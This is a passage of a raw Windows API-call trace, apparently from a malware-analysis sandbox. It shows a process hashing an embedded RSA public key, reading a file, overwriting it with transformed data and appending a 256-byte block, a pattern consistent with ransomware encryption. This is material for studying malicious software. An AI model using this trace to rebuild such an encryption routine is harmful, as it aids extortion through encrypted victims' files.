lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.048] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x18c23, lpOverlapped=0x0) returned 1 [0188.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.050] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.051] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.051] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.051] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.051] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.051] SetLastError (dwErrCode=0x0) [0188.051] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.052] GetLastError () returned 0x0 [0188.052] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] GetLastError () returned 0x0 [0188.053] SetLastError (dwErrCode=0x0) [0188.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.054] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.054] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.054] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.054] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.054] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18c20) returned 0x2af5168 [0188.055] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2140 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d808 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20f8 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.056] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae3ea0 [0188.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae40c0 [0188.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae40c0 | out: hHeap=0x2c0000) returned 1 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d820 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d7f0 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.059] GetCurrentThreadId () returned 0x5d8 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2edf90 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.060] GetCurrentThreadId () returned 0x5d8 [0188.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0188.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d820 [0188.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0188.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d880 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8e0 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d838 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d7f0 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae3ea0 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae40b0 [0188.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae42c8 [0188.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae40b0 | out: hHeap=0x2c0000) returned 1 [0188.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42c8 | out: hHeap=0x2c0000) returned 1 [0188.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0188.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae20f8 | out: hHeap=0x2c0000) returned 1 [0188.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.071] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x18c1e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x18c1e, lpOverlapped=0x0) returned 1 [0188.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.073] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18c23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.073] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.073] 